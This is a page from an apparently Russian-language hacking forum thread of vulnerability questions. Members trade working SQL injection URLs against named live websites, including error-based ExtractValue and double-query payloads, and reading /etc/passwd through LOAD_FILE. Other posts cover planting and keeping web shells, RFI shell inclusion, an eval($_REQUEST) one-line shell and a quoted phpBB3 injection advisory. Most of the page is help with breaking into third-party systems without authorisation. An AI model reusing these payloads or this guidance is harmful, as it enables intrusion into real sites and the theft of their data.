PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 [87] 88 89 90 91 92 93 94 95 96 97 98

Konqi
20.10.2012, 17:17
WendM said:
А что делает функция ExtractValue () ?


http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html#function_extractvalue

подобными вопросами в гугл, не флудим в теме

Expl0ited
20.10.2012, 17:19
http://vk.com/id1'+union+select+1,2,3+--+

Подскажите как вывести все пароли? Что я делаю не так?

Aplik
20.10.2012, 18:28
В sql бекапе нашел следующую запись

('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')

dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?

Я только начинаю курить..

Konqi
20.10.2012, 18:29
Aplik said:
В sql бекапе нашел следующую запись
('3','dsamir','dGVzdDEyMzQ=','miroslav@forge.com.u a','M','V','1',NULL,'3','2010-06-08 00:44:28','3','0','1','1','')
dGVzdDEyMzQ= я так понимаю это пароль, но чем он зашифрован?
Я только начинаю курить..


Кодировка base64

Aplik
20.10.2012, 18:41
Konqi said:
Кодировка base64


спасибо

жалко только пароль не подходит

qaz
20.10.2012, 23:09
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так


insert into ib4.a values ('(SELECT load_file("/etc/passwd")')


чет вместо содержимого etc/passwd пишет его как строчку. как исправить?

VY_CMa
20.10.2012, 23:16
qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?


Пробовал просто вывести?


SELECT load_file("/etc/passwd")


С кавычками играл?

Konqi
20.10.2012, 23:17
qaz said:
такой вопросец, получил доступ в phpmyadmin питался скачать файл etc/passwd, не выводит, пробую записать в таблицу, так
чет вместо содержимого etc/passwd пишет его как строчку. как исправить?


епрст! ну сколько можно. когда наконец откроете гребанный учебник по MySQL?

все что внутри кавычек - называется строкой

вы пишите текст, потом удивляетесь

insert into tbl (`wtf`) values ((select load_file('/etc/passwd')))

WendM
21.10.2012, 08:05
Konqi said:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html


Спасибо еще раз. Но дольше раскрутить не могу.

Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Но выдает ошибку 406. Что можно сделать?

Expl0ited
21.10.2012, 09:27
WendM said:
Спасибо еще раз. Но дольше раскрутить не могу.
Пробовал так _http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html
Но выдает ошибку 406. Что можно сделать?


лимит использовать

WendM
21.10.2012, 10:00
Expl0ited said:
лимит использовать


А как его заюзать без пробелов? limit(0,1) не проходит

WendM
21.10.2012, 14:46
Ребята как раскрутить дальше??


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,version()+)+)+)='1

делал так


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+)+)+)='1 ОБЛОМ.

и так


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.

Так же не решен вопрос с этой скулей


Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо

MaxFast
21.10.2012, 15:02
Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.

WendM
21.10.2012, 15:18
MaxFast said:
Не нашел раздела с уязвимостями для Bitrix. Посоветуйте.


Тут наверно _/thread58123.html

winstrool
21.10.2012, 15:26
WendM said:
Ребята как раскрутить дальше??

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,version()+)+)+)='1

делал так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+)+)+)='1 ОБЛОМ.

и так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.

Так же не решен вопрос с этой скулей

Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо


Пользуйся)


http://www.muscletalk.ru/pharma.php?id=999999.9%27+or+%28+ExtractValue+%281 ,concat%280x3a,%28select+table_name+from+informati on_schema.tables+limit+0,1%29%29%29%29=%271

cat1vo
21.10.2012, 15:35
WendM said:
Ребята как раскрутить дальше??

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,version()+)+)+)='1

делал так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+)+)+)='1 ОБЛОМ.

и так

Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+or+(+ExtractValue+(1,+conc at(+0x3a,+select+table_name+from+INFORMATION_SCHEM A.TABLES+limit+1,2+)+)+)='1 ОБЛОМ.

Так же не решен вопрос с этой скулей

Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

Прошу показать хотя бы вывод table_name из INFORMATION_SCHEMA. Спасибо


WendM,

Держите решение Вашей проблемы:


Code:
http://www.muscletalk.ru/pharma.php?id=999999.9'+in+(select(@:=1)||@+from+( select+1+union+select+2+union+select+3)k+group+by+ concat(@@version,!@)having@||min(@:=0))+and+'1#

WendM
21.10.2012, 15:52
winstrool said:
Пользуйся)


Спасибо) Но такой вариант не проходит на


Code:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3d,select(TABLE_NAM E)from(INFORMATION_SCHEMA.TABLES))))='1.html

WendM
21.10.2012, 18:32
Тестирую на локалке метод залива шелла через sql inj.

Уязвимый php


PHP:
Новость №".$line['id']."
";

}

exit;

}

$query="SELECT text FROM news WHERE id= ".$_GET['id'];

$result=mysql_query($query);

print"";

while ($line=mysql_fetch_array($result,MY SQL_ASSOC)) {

print"";

foreach ($lineas$col_value) {

print"$col_value";

}

print"";

}

print"";

mysql_free_result($result);

mysql_close($link);



?>

Делаю запрос


Code:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql. user+where+user='root'+--+

Вылетают ошибки.

Делаю так


Code:
http://localhost/mynews.php?id=1+union+select+file_priv+from+mysql. user+where+user=0x27726F6F7427+--+

Выводится First news

Что не так делаю?

dynda2000
21.10.2012, 21:16
Получилось залить шелл через phpmyadmin, но админы на серве постоянно переустанавливают свой серв и стирают мой шелл, даже иногда не устанавливают phpmyadmin, но вот седня снова они его установили я побырому залил шел во все щели но это не поможет после переустановки все снова слетит. Но база mysql она всегда таже, вот я и подумал можно ли создать там таблицу с этим кодом


PHP:
Click";} else {die("err");}}?>



И как то указать чтоб он автоматически его создавал по указанному адресу например раз в неделю или при его отсутствии. Помогите плииз.

OxoTnik
21.10.2012, 21:19
dynda2000

http://video.antichat.ru/video/17/ прокатит?

Tir TNT
22.10.2012, 04:36
Нашел дыру Nginx & PHP via FastCGI на member.my-addr.com. Хочется слить исходники многих их сервисов. Пример:


https://member.my-addr.com/robots.txt/run.php


Залить любой файл на сайт вроде никак. Есть варианты решения проблемы?

Описание дыры:

_http://cnedelcu.blogspot.com/2010/05/nginx-php-via-fastcgi-important.html

WendM
22.10.2012, 05:30
Konqi said:
я. подобные посты дальше будут удалятся. разбирайтесь сами. это не клуб помощи новичкам


Ваши вопросы по уязвимостям

По моему я в правильный раздел написал.

Ну не могу я получить количество стандартными grpoup by и order by, так же перебор через union select тоже не дает результата. Мануалы по sql inj молчат на этот случай.

Вопрос: " Можно ли получить количество полей при не работающих вариантах с grpoup by и order by. Если да, то как?" tnx!)

BigBear
22.10.2012, 08:31
WendM said:
Ваши вопросы по уязвимостям
По моему я в правильный раздел написал.
Ну не могу я получить количество стандартными grpoup by и order by, так же перебор через union select тоже не дает результата. Мануалы по sql inj молчат на этот случай.
Вопрос: " Можно ли получить количество полей при не работающих вариантах с grpoup by и order by. Если да, то как?" tnx!)


Можно. Зависит от случая. И от WAF кстати тоже.

mod_
24.10.2012, 17:30
BigBear said:
Ну вот самый примитивный пример frame.
_ttp://www.prodisney.ru/index.php?page=http://rambler.ru
Это ну никак нельзя перепутать с RFI


LFI не получается найти - задолбался перебирать конструкции ../../etc/passwd, RFI паходу нет.

Но при запросе

_ttp://www.*********.ru/index.php?page=info.php успешно выводится содержимое инфо.пхп B frame

_ttp://www.********.ru/index.php?page=test.php также успешно выводится B frame на странице

September 5, 2004

/home/t*******1/public_html/sitenameАга

естьли возможность проинклюдить файл info.php или test.php как показано здесь (http://video.antichat.ru/video/34/)

и если да то как потом запустить всю эту конструкцию) если я никак не могу добраца до ../етс/пассвд или не обязательно вообще до него добираться?

или как это все осуществить.капец я запутался чета уже

Unknown
24.10.2012, 20:25
mod_ said:
LFI не получается найти - задолбался перебирать конструкции ../../etc/passwd, RFI паходу нет.
Но при запросе
_ttp://www.*********.ru/index.php?page=info.php успешно выводится содержимое инфо.пхп B frame
_ttp://www.********.ru/index.php?page=test.php также успешно выводится B frame на странице
September 5, 2004
/home/t*******1/public_html/sitenameАга
естьли возможность проинклюдить файл info.php или test.php как показано
здесь (http://video.antichat.ru/video/34/)
и если да то как потом запустить всю эту конструкцию) если я никак не могу добраца до ../етс/пассвд или не обязательно вообще до него добираться?
или как это все осуществить.капец я запутался чета уже


Для заливки шелла через phpinfo();, тебе нужен LFI и доступ к tmp, если не можешь прочетать tmp, то не как. понятное дело ты можешь в сплоите поменять директории, но прав на запись тебе не кто не даст.

P.S. сплоит не будет работать, если phpinfo(), не создает глобальный массив $_FILES[]

WendM
24.10.2012, 20:32
Это LFI?

_http://web.fhnw.ch/technik/projekte/eit/Fruehling2011/JaegLoch/index.php?include=

Если да, то почему не получается получить etc/passwd

KolosJey
24.10.2012, 22:11
Cennarios said:
Первое: http://www.prodisney.ru/index.php?page=images/leftmenu5/back_0s.jpg
Второе:http://www.prodisney.ru/index.php?page=../prodisney/info.php
Третье:http://www.prodisney.ru/index.php?page=images/../images/leftmenu5/back_0s.jpg
Вывод: Выше корня выставленны соответствующие права, не дающие произвести желаемые операции.
Регистрируйся на форуме и проверяй зальется ли аватарка с сохранением php кода после ресайза.


Я пожалуй повторю:

/showpost.php?p=3308397&postcount=21440

Я не пойму это юмор какой-то ачатовский, или вы тут всегда так круто всё взламываете?

Cennarios
24.10.2012, 23:14
И взаправду. Чего стоило в базовый код страницы для начала посмотреть? Ты, мистер умник, как раз такой юморной, что только для тебя такие ответы и посты создаются. И во фразе - `Я пожалуй повторю`, после буквы Я ставится запятая.

mod_
24.10.2012, 23:44
да там одмин походу крякнул.уже 10 дней жду активации акка на этом пхпББ

Cennarios
24.10.2012, 23:47
mod_ said:
да там одмин походу крякнул.уже 10 дней жду активации акка на этом пхпББ


Не напрягайся =) Там тупой ифрейм. Це не инклуд позор на мои седины. http://www.prodisney.ru/articles/news1012.php?nid='3455&cat=n&f=1 Вот раскрытие путей, как бонус )

WendM
26.10.2012, 15:10
Как называется уязвимости такого рода?

_http://lavart.su/examples'

Vip77
26.10.2012, 15:14
раскрытие путей=)

kacergei
26.10.2012, 18:13
Собственно возникло 2 вопроса:

1) Имеется FCKeditor version 2.6.4.1 Build 23187, есть варианты залить shell?

2) Есть форма для загрузки картинок php спокойно грузит, но вот проблема в том что при просмотре выдает:

[CODE]
Code:
яШяаJFIFяю>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality яЫC    $.' ",#(7),01444'9=82

DyukiN
26.10.2012, 18:18
_ttp:/thread314734.html

Faaax
27.10.2012, 07:03
Ребят подскажите в чём проблемма?

Имеется RFI


Code:
http://www.basegroup.su/index.php?Page=

но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.

Подскажите как решить проблемму?

WendM
27.10.2012, 07:11
Faaax said:
Ребят подскажите в чём проблемма?
Имеется RFI

Code:
http://www.basegroup.su/index.php?Page=

но когда подставляю ссыль на свой шелл,то всё выводит,но выполняет на моём серваке,а не на сайте.
Подскажите как решить проблемму?


1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)

2) Шелл должен быть вида shell.txt

Удачи

P.S У меня все работает))!

Faaax
27.10.2012, 07:19
мля запарил,что серв не должен поддерживать php(

да это знаю,просто запарил

BigBear
27.10.2012, 07:34
WendM said:
1) Твой сервер не должен поддерживать php (narod.ya.ru идеален)


Не совсем так. Правильнее будет сказать, что сервер должен отдавать php в формате plain-text. А использовать narod.ru или положить в корень своего сайта .htaccess - ваше дело.

По сути подойдёт любой сторонний шелл и пара строчек в корне папки.

Совсем не обязательно иметь дело с narod.ru


WendM said:
2) Шелл должен быть вида shell.txt


Опять ошибочное суждение. Не важно расширение файла, так как при инклуде любой файл интерпретируется как PHP.

Важно, лишь чтобы файл не интерпретировался на дочернем сайте. Но об этом я писал выше.

Faaax
27.10.2012, 07:43
хм всё равно не хочет

WendM
27.10.2012, 09:09
Faaax said:
хм всё равно не хочет


ну у меня то работает

Faaax
27.10.2012, 09:18
не знаю чё такое у меня

ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt

просто пустая страница,а в исходнике код и всё

Faaax
27.10.2012, 09:33
PHP:
eval($_REQUEST[c]);

qaz
28.10.2012, 23:13
такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?

winstrool
28.10.2012, 23:20
Пути к логам ошибок задаются в настройках apache в файле httpd.conf

распрастранненые пути файлов настроек сможешь посмотреть сдесь,


https://www.forum.antichat.ru/thread324564.html

Ravenous
29.10.2012, 00:02
Faaax said:
не знаю чё такое у меня
ставлю http://www.basegroup.su/index.php?Page=site.narod.ru/shell.txt
просто пустая страница,а в исходнике код и всё


Кэп подсказывает, что это не инклуд, а file_get_contents()

VY_CMa
29.10.2012, 00:12
qaz said:
такой вопросец, не очень знаком с файлами настройки хостинга, но можно както в etc/passwd или php.ini узнать путь к логам ошибок?


В php.ini есть параметр "error_log", он указывает на путь к логам ошибок интерпритации, но как максимум это только FPD.

Cennarios
29.10.2012, 00:46
На хостингах обычно, что естественно, используются логически упорядоченные скелеты конфигураций хостов. Те , что-то вида: /serv/userXXX/conf/vhost.conf и подобное. Тупое спихивание конфигураций в httpd.conf или конфигов массово в папку а-ля sites-enabled способствует ухудшению удобства в настройке и использовании, а так-же не неверно сточки зрения изоляции уникального клиента. То-же касается и php.ini файла. Но это банальная схема для среднестатистического хостинга. Иные конфигурации используются в случаях если система не очень масштабна или следование логически верным построениям конфигурации системы не очень строги. Опять-же, излишняя унификация не столь необходима в случаях небольшого количества виртуальных хостов на сервере.

shell_c0de
29.10.2012, 00:56
2Faaax залей на свой хост мини шелл и работай постом, все там робит.

DasTem
29.10.2012, 13:17
как использовать эту уязвимость?

Nginx buffer underflow vulnerability

Вот читал про нее:

http://www.securelist.com/ru/advisories/36751

Хелп, нашел в одной игре)

Always
29.10.2012, 21:28
http://elektri4ka.com/kino.php?info=270622&carcas=0

Кто сможет помочь?

stan_q
30.10.2012, 09:53
Как организовать backconnect/bind при отключенных функциях php

exec,passthru,shell_exec,system,proc_open,popen?

Если можно, подробнее.

blesse
30.10.2012, 10:19
stan_q said:
Как организовать backconnect/bind при отключенных функциях php
exec,passthru,shell_exec,system,proc_open,popen?
Если можно, подробнее.


Какие еще оболочки присутствуют на серваке?

Попробуй залить Шеллы на перле,асп'е,ssi

На них уже ограничения не действуют

kroŧ
30.10.2012, 12:14
stan_q

оператор исполнения (http://php.net/manual/ru/language.operators.execution.php)

Stricker
30.10.2012, 12:52
Здравствуйте, вопрос такой:


$size = getimagesize($_FILES[$formName]['tmp_name']);
$format = strtolower(substr($size['mime'], strpos($size['mime'], '/')+1));
move_uploaded_file($_FILES[$formName]['tmp_name'], $G_Settings["DIR_IMG"]."/{$G_Settings["IMG_NAMES"]}.{$format}")


Изображение заливается, и присваивается ему расширение исходя из Mime Type От getimagesize

Как обойти и чтобы назначилось php Значение?

stan_q
30.10.2012, 13:24
blesse said:
Какие еще оболочки присутствуют на серваке?
Попробуй залить Шеллы на перле,асп'е,ssi
На них уже ограничения не действуют


Нету ничего, окромя пхп.

kroŧ


Обратные кавычки недоступны, в случае, если включен безопасный режим или отключена функция shell_exec().


У меня функция отключена

Koren
30.10.2012, 21:15
на друпал 5.23 есть уязвимость с мускулом?

ukrpunk
31.10.2012, 02:29
такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...

при инъекции


-235/**//*!union*//**//*!select*//**/version(),2,3/**//*!from*//**/--


все ок, т.е. вывод есть

но когда пытаюсь получить имена таблиц


PHP:
-235/**//*!union*//**//*!select*//**/group_concat(table_name),2,3/**//*!from*//**/information_schema.tables--

сайт ругается


Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, 4564646@6456456.456 and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.


как вытащить имена ?

Cennarios
31.10.2012, 02:48
ukrpunk said:
такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...
при инъекции
все ок, т.е. вывод есть
но когда пытаюсь получить имена таблиц

PHP:
-235/**//*!union*//**//*!select*//**/group_concat(table_name),2,3/**//*!from*//**/information_schema.tables--

сайт ругается
как вытащить имена ?


А unhex(hex('xyu')) попробовать?

ukrpunk
31.10.2012, 02:55
Cennarios said:
А unhex(hex('xyu')) попробовать?


пробовал - ругается. попробовал вот так


unhex('7461626c655f6e616d65')


вывело тупо table_name,table_name,table_name

Cennarios
31.10.2012, 03:02
ukrpunk said:
пробовал - ругается. попробовал вот так
вывело тупо table_name,table_name,table_name


Начнем с того, что частенько фильтруется или для юзера нет прав на _schema.tables, быть может поможет что-то вида:

union select group_concat(table_name) from information_schema.columns where column_name like '%pass%' (или hex представление)

Always
31.10.2012, 20:04
Always said:
http://elektri4ka.com/kino.php?info=270622&carcas=0
Кто сможет помочь?


Никто?

MaxFast
31.10.2012, 20:05
Always said:
Никто?


Это не SQLi.

borntobebad
01.11.2012, 08:24
помогите найти название таблицы .

view-source:http://www.clapwall onie.be/www/liste_ techniciens?&idfig=-512+or+1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,31,table_name+F ROM+test--+

BigBear
01.11.2012, 10:57
borntobebad said:
помогите найти название таблицы .
view-source:http://www.clapwall onie.be/www/liste_ techniciens?&idfig=-512+or+1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1,2,3,4 ,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,31,table_name+F ROM+test--+


_ttp://www.clapwallonie.be/www/liste_techniciens?&idfig=-512/**/and/**/1=2+union+select+1,null,null,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,table_name,25,26, 27,28,29,30,31,32+from+information_schema.tables+l imit+0,1+--+


Clap Wallonie : : CHARACTER_SETS

CoBecTb
02.11.2012, 00:56
[CODE]
Code:
------------------------------------------------------------------
Name : phpBB3 SQL Injection
------------------------------------------------------------------
Date : 27.07.2012
------------------------------------------------------------------
Site : www.phpbb.com
------------------------------------------------------------------
Version : 3.0.10
------------------------------------------------------------------

1) What is it?
This is very nice forum board. You should try it!
------------------------------------------------------------------
2) Type of bug?
SQL Injection (or SQL-info-Leak if You want).
------------------------------------------------------------------
3) Where is the bug?
Vulnerable parameter seems to be 'style' because if we set up this parameter
to 'bigger number' (for example: 111111111) we will get an error, with full SQL
statement.

*updated - dateformat is the second vulnerable parameter!
*updated - post_st is the 3rd vulnerable parameter!
*updated - another one: topic_st


4) PoC traffic from Burp:
4.1) Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2

BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

---


4.2 Other response (this time from post_st parameter):
---


Return to the index page


General Error
SQL ERROR [ mysqli ]

Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]

An SQL error occurred while fetching this page.
Please contact the

BigBear
02.11.2012, 07:34
CoBecTb said:
Как воспользоваться данной инъекцией, так неразу ответа не получил, научите плз, заранее благодарю.


Для особо ленивых и не внимательных - маркирую цветом...


Code:
4.1) Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2


BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)

CoBecTb
02.11.2012, 12:19
BigBear said:
Для особо ленивых и не внимательных - маркирую
цветом
...

Code:
4.1) Request :

---
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=
Content-Type: application/x-www-form-urlencoded
Content-Length: 258
Connection: close

viewemail=1
&massemail=1
&allowpm=1
&hideonline=0
&notifypm=1
&popuppm=0
&lang=en
&style=%2b1111111111
&tz=0
&dst=0
&dateoptions=D+M+d%2C+Y+g%3Ai+a
&dateformat=D+M+d%2C+Y+g%3Ai+a
&submit=Submit
&creation_time=1343370877
&form_token=576...

---

4.2) Response:

---
HTTP/1.1 503 Service Unavailable
Date: Fri, 27 Jul 2012 06:39:06 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2889


Return to the index page

General Error
SQL ERROR [ mysqli ]

Out of range value for column 'user_style' at row 1 [1264]

SQL

UPDATE phpbb_users
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111
WHERE user_id = 2


BACKTRACE

FILE: [ROOT]/includes/db/mysqli.php

LINE: 182

CALL: dbal->sql_error()

FILE: [ROOT]/includes/ucp/ucp_prefs.php

LINE: 100

CALL: dbal_mysqli->sql_query()

FILE: [ROOT]/includes/functions_module.php

LINE: 507

CALL: ucp_prefs->main()

FILE: [ROOT]/ucp.php

LINE: 333

CALL: p_master->load_active()

Please notify the board administrator or webmaster: (...)



Большое спасибо за подсказку, но как мне её запустить. пробовал через wappex ничего не выходит. Заранее благодарю.

vaddd
02.11.2012, 14:39
news.php?id=0 union select 1,2,3,4,5,6,7,8,9 from information_schema.tables - ok

news.php?id=0 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables - новость не существует

как можно обойти?

BigBear
02.11.2012, 15:05
vaddd said:
news.php?id=0 union select 1,2,3,4,5,6,7,8,9 from information_schema.tables - ok
news.php?id=0 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables - новость не существует
как можно обойти?


news.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables limit 0,1

vaddd
02.11.2012, 15:49
BigBear said:
news.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8,table_name from information_schema.tables limit 0,1


тоже самое...

kingbeef
02.11.2012, 16:42
news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables

Так попробуй,а лучше выложи ссыль.

CoBecTb
02.11.2012, 17:15
BigBear said:
Для особо ленивых и не внимательных - маркирую
цветом
...


Извините плз, возможно ли реализовать эту инъекцию через wappex?

Если да, то объясните в 2х словах или подробно если не сложно.

Ещё раз извиняюсь за назойливость.

vaddd
02.11.2012, 21:40
kingbeef said:
news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables
Так попробуй,а лучше выложи ссыль.


http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5, 6,7,8,9

